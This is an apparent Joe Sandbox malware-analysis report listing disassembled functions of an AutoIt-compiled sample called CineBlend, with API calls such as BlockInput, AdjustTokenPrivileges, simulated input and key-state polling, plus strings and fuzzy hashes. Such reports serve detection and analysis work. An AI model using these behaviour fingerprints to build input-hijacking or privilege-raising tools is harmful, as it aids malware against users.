Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 3563d63644081302ce8b3ec39cfbc240992f8f9b006bf85381a8a6bd41c1bb26
Instruction ID: fdc021e258412bab5509b4a8411e704ef6b7d6a5a739b0058a8e97631904f866
Opcode Fuzzy Hash: 3563d63644081302ce8b3ec39cfbc240992f8f9b006bf85381a8a6bd41c1bb26
Instruction Fuzzy Hash: F7F06D7580424DABDF019FA4D805BBE7BB0FF08309F00805AF951A6191D7798601DF94

Function 00B91A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B91B48), ref: 00B91A20
CloseHandle.KERNEL32(?,?,00B91B48), ref: 00B91A35

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2b0cf51065fa00ea8525d475a1c4de865478fff660f9cdc5c3599352675e7777
Instruction ID: 3e2c5713b3e492d9b2baac5d10a783f3573b5926f0f208cb6027ddbd1b7ff458
Opcode Fuzzy Hash: 2b0cf51065fa00ea8525d475a1c4de865478fff660f9cdc5c3599352675e7777
Instruction Fuzzy Hash: B5E04F72014A11AFE7252B14FC05F7277E9FF04351F14886DF8A581470DB726C91DB14

Function 00BAF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00BAF51A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: eef72e071899f08300d7e0fea287de3a9cd116be5c4a1bc967c7e3421efdcc5a
Instruction ID: d36680c484c3e04e9c54937d2de0c37e9ed1793995addbc094c0760409e8afec
Opcode Fuzzy Hash: eef72e071899f08300d7e0fea287de3a9cd116be5c4a1bc967c7e3421efdcc5a
Instruction Fuzzy Hash: F2E048362042055FC710AFA9D445E96F7D8EFA5761F108466F849D7351DA70F940CB94

Function 00B9EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B9ECC7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 9cdd939d803d1bdbb8661e01654f4d55121511de3e5034d1c5f3ec94be0691ed
Instruction ID: b73693846269f8a4b8fe40b9f5ed4b18c801017886a1e221767ca4857bdfe581
Opcode Fuzzy Hash: 9cdd939d803d1bdbb8661e01654f4d55121511de3e5034d1c5f3ec94be0691ed
Instruction Fuzzy Hash: 21D05EB619420038FD1D8B3C8E6FF7626A9F701741F8C06F9B2A2C57D8E5D1E980E021

Function 00B50D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00B5075E), ref: 00B50D4A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d128e5321523afb6ed0c6f69ed9480ed12362378c06268a6d072e38be4afe28e
Instruction ID: 20043a55cef7ab888db096af428d6e91293d5f0951a85f562e3ede88304f916f
Opcode Fuzzy Hash: d128e5321523afb6ed0c6f69ed9480ed12362378c06268a6d072e38be4afe28e
Instruction Fuzzy Hash:

Function 00BB353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BB358D
DeleteObject.GDI32(00000000), ref: 00BB35A0
DestroyWindow.USER32 ref: 00BB35AF
GetDesktopWindow.USER32 ref: 00BB35CA
GetWindowRect.USER32(00000000), ref: 00BB35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00BB3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00BB370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB3755
GetClientRect.USER32(00000000,?), ref: 00BB3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BB379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB37DD
GlobalLock.KERNEL32(00000000), ref: 00BB37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB37F5
GlobalUnlock.KERNEL32(00000000), ref: 00BB37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB3805
GlobalFree.KERNEL32(00000000), ref: 00BB3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BD0C04,00000000), ref: 00BB3838
GlobalFree.KERNEL32(00000000), ref: 00BB3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00BB386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00BB388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BB3A9C

Strings

DISPLAY, xrefs: 00BB38FF
, xrefs: 00BB3A22
static, xrefs: 00BB3797, 00BB38EE
AutoIt v3, xrefs: 00BB374F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e45a289eae71d50485c8a045a4d1d46f963c64861920417afee1c2280c853e38
Instruction ID: c0f731ad59cf5aa6e2d70d9edcabcdc959895971fe272e183a1819b7b3f70135
Opcode Fuzzy Hash: e45a289eae71d50485c8a045a4d1d46f963c64861920417afee1c2280c853e38
Instruction Fuzzy Hash: C5025C75900215AFDB14DFA4CD89EAE7BF9FB48710F1481A8F915AB2A0DB74ED01CB60

Function 00BC7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00BC7B67
GetSysColorBrush.USER32(0000000F), ref: 00BC7B98
GetSysColor.USER32(0000000F), ref: 00BC7BA4
SetBkColor.GDI32(?,000000FF), ref: 00BC7BBE
SelectObject.GDI32(?,?), ref: 00BC7BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00BC7BF8
GetSysColor.USER32(00000010), ref: 00BC7C00
CreateSolidBrush.GDI32(00000000), ref: 00BC7C07
FrameRect.USER32(?,?,00000000), ref: 00BC7C16
DeleteObject.GDI32(00000000), ref: 00BC7C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00BC7C68
FillRect.USER32(?,?,?), ref: 00BC7C9A
GetWindowLongW.USER32(?,000000F0), ref: 00BC7CBC

Part of subcall function 00BC7E22: GetSysColor.USER32(00000012), ref: 00BC7E5B
Part of subcall function 00BC7E22: SetTextColor.GDI32(?,00BC7B2D), ref: 00BC7E5F
Part of subcall function 00BC7E22: GetSysColorBrush.USER32(0000000F), ref: 00BC7E75
Part of subcall function 00BC7E22: GetSysColor.USER32(0000000F), ref: 00BC7E80
Part of subcall function 00BC7E22: GetSysColor.USER32(00000011), ref: 00BC7E9D
Part of subcall function 00BC7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BC7EAB
Part of subcall function 00BC7E22: SelectObject.GDI32(?,00000000), ref: 00BC7EBC
Part of subcall function 00BC7E22: SetBkColor.GDI32(?,?), ref: 00BC7EC5
Part of subcall function 00BC7E22: SelectObject.GDI32(?,?), ref: 00BC7ED2
Part of subcall function 00BC7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00BC7EF1
Part of subcall function 00BC7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BC7F08
Part of subcall function 00BC7E22: GetWindowLongW.USER32(?,000000F0), ref: 00BC7F15

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 0206392324111147d5aee04a38c805ecca0590a5afdc7e300cca8c43f49b3f24
Instruction ID: 7d9e68953343799df726d0b15acb5e8eb6b47f0fa113b1b115bcd148dd313f98
Opcode Fuzzy Hash: 0206392324111147d5aee04a38c805ecca0590a5afdc7e300cca8c43f49b3f24
Instruction Fuzzy Hash: B7A16B76008301AFC7119F64DC48E6BBBE9FB4C321F140A29F962A71A0DB71D9448F92

Function 00B31625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00B316B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B72B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B72B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B72F85

Part of subcall function 00B31802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B31488,?,00000000,?,?,?,?,00B3145A,00000000,?), ref: 00B31865

SendMessageW.USER32(?,00001053), ref: 00B72FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B72FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B72FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B72FF9

Strings

0, xrefs: 00B72E11

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: a138350c2b8fc26e97de51ea343e70fc5f933b7c6a8ee46f103ebf320514d7ae
Instruction ID: b06896771c138b8936897d651d8e051232b33272a8f137b63aa5eade9cbf654a
Opcode Fuzzy Hash: a138350c2b8fc26e97de51ea343e70fc5f933b7c6a8ee46f103ebf320514d7ae
Instruction Fuzzy Hash: 79128134604241DFD725CF58C899B69B7E5FB48300F28C5A9F4A99B261CB31EC82DB91

Function 00BB316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00BB319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BB32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00BB3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00BB3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00BB335D
GetClientRect.USER32(00000000,?), ref: 00BB3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00BB33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BB33C1
GetStockObject.GDI32(00000011), ref: 00BB33D1
SelectObject.GDI32(00000000,00000000), ref: 00BB33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00BB33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB33EE
DeleteDC.GDI32(00000000), ref: 00BB33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BB3423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00BB343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00BB347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BB348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00BB349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00BB34D4
GetStockObject.GDI32(00000011), ref: 00BB34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BB34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00BB34F4

Strings

DISPLAY, xrefs: 00BB33B7
msctls_progress32, xrefs: 00BB3470
static, xrefs: 00BB33AC, 00BB34CE
AutoIt v3, xrefs: 00BB3355

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 3b307e3088e32d7903bea386226dd29bd51557e235513add32c38f6fdf3604dc
Instruction ID: 778f250422db802514e204b4432bbf59c27ecd0e85fc483fe5942e8a30a5b9e1
Opcode Fuzzy Hash: 3b307e3088e32d7903bea386226dd29bd51557e235513add32c38f6fdf3604dc
Instruction Fuzzy Hash: D1B16075A00215AFEB14DFA8CC49FAEBBF9EB08710F114155FA15E72A0DBB4AD00CB54

Function 00BA5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00BA5532
GetDriveTypeW.KERNEL32(?,00BCDC30,?,\\.\,00BCDCD0), ref: 00BA560F
SetErrorMode.KERNEL32(00000000,00BCDC30,?,\\.\,00BCDCD0), ref: 00BA577B

Strings

USB, xrefs: 00BA56F9
CDROM, xrefs: 00BA5640
iSCSI, xrefs: 00BA5707
Fixed, xrefs: 00BA564E
FileBackedVirtual, xrefs: 00BA5731
Fibre, xrefs: 00BA56F2
Removable, xrefs: 00BA5655, 00BA565A
SSA, xrefs: 00BA56EB
SATA, xrefs: 00BA5715
SCSI, xrefs: 00BA56CF
SSD, xrefs: 00BA568F
ATA, xrefs: 00BA56DD
ATAPI, xrefs: 00BA56D6
Unknown, xrefs: 00BA5632, 00BA56C8
RAMDisk, xrefs: 00BA5639
MMC, xrefs: 00BA5723
SAS, xrefs: 00BA570E
PhysicalDrive, xrefs: 00BA55BB
Network, xrefs: 00BA5647
RAID, xrefs: 00BA5700
\\.\, xrefs: 00BA5584
Virtual, xrefs: 00BA572A
1394, xrefs: 00BA56E4

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: b27c6411965ef4325bdad3a5794b6e1dd6ad322789635beea98703448375ac4a
Instruction ID: 8525b6d87efae0716310380697753ccc720737d57ee2bb8e06435002d44ad46d
Opcode Fuzzy Hash: b27c6411965ef4325bdad3a5794b6e1dd6ad322789635beea98703448375ac4a
Instruction Fuzzy Hash: D361D174A8CA09DBC734DF28C991DB873F1EF16360B6480E5E506AB2A1DB31DE05DB51

Function 00BC1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BC1BC4
GetDesktopWindow.USER32 ref: 00BC1BD9
GetWindowRect.USER32(00000000), ref: 00BC1BE0
GetWindowLongW.USER32(?,000000F0), ref: 00BC1C35
DestroyWindow.USER32(?), ref: 00BC1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BC1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BC1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BC1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00BC1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00BC1CE1
IsWindowVisible.USER32(00000000), ref: 00BC1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00BC1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00BC1D6C
GetWindowRect.USER32(00000000,?), ref: 00BC1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00BC1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00BC1DC4
CopyRect.USER32(?,?), ref: 00BC1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00BC1E46

Strings

0, xrefs: 00BC1B6F
(, xrefs: 00BC1DB7
tooltips_class32, xrefs: 00BC1C82

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3ca2661c59c33d2f178ef2d4c718c19bc057b3f556f2e6d6f099ab24b2183c21
Instruction ID: 48106233566cc1cc612eb82cdf5d14b6d54653f49b5da47934c9f49d0f8e92a6
Opcode Fuzzy Hash: 3ca2661c59c33d2f178ef2d4c718c19bc057b3f556f2e6d6f099ab24b2183c21
Instruction Fuzzy Hash: C2B15C71604301AFD714DF68C985F6ABBE5EF89310F00895DF599AB2A2CB71E844CB92

Function 00BC0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BC0D81
_wcslen.LIBCMT ref: 00BC0DBB
_wcslen.LIBCMT ref: 00BC0E25
_wcslen.LIBCMT ref: 00BC0E8D
_wcslen.LIBCMT ref: 00BC0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BC0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BC0FA0

Part of subcall function 00B4FD52: _wcslen.LIBCMT ref: 00B4FD5D

Part of subcall function 00B92B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B92BA5
Part of subcall function 00B92B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B92BD7

Strings

ISSELECTED, xrefs: 00BC0F79
DESELECT, xrefs: 00BC1038
FINDITEM, xrefs: 00BC10C3
SELECTCLEAR, xrefs: 00BC0FC9
SELECTALL, xrefs: 00BC0FB1
GETTEXT, xrefs: 00BC0E88, 00BC0EA3
SELECTINVERT, xrefs: 00BC101A
GETITEMCOUNT, xrefs: 00BC0DB2, 00BC0DD3
GETSELECTED, xrefs: 00BC107D
VIEWCHANGE, xrefs: 00BC1111
SELECT, xrefs: 00BC0FE4
GETSELECTEDCOUNT, xrefs: 00BC0F0C, 00BC0F27
GETSUBITEMCOUNT, xrefs: 00BC0E20, 00BC0E3B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 5f302f655d9bcf866900c91abd5776c52f9c37d80cc3d07a149e856389c3a40b
Instruction ID: ec7b2cdc82a7864c1d94a32a21598895a8fd8d88636d39be774eeb0bd931efca
Opcode Fuzzy Hash: 5f302f655d9bcf866900c91abd5776c52f9c37d80cc3d07a149e856389c3a40b
Instruction Fuzzy Hash: CCE18D326142418FCB14EF28C591E7AB7E5FF85314B1449ACF896AB2A2DB30ED45CB91

Function 00B32521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B325F8
GetSystemMetrics.USER32(00000007), ref: 00B32600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B3262B
GetSystemMetrics.USER32(00000008), ref: 00B32633
GetSystemMetrics.USER32(00000004), ref: 00B32658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B32675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B32685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B326B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B326CC
GetClientRect.USER32(00000000,000000FF), ref: 00B326EA
GetStockObject.GDI32(00000011), ref: 00B32706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B32711

Part of subcall function 00B319CD: GetCursorPos.USER32(?), ref: 00B319E1
Part of subcall function 00B319CD: ScreenToClient.USER32(00000000,?), ref: 00B319FE
Part of subcall function 00B319CD: GetAsyncKeyState.USER32(00000001), ref: 00B31A23
Part of subcall function 00B319CD: GetAsyncKeyState.USER32(00000002), ref: 00B31A3D

SetTimer.USER32(00000000,00000000,00000028,00B3199C), ref: 00B32738

Strings

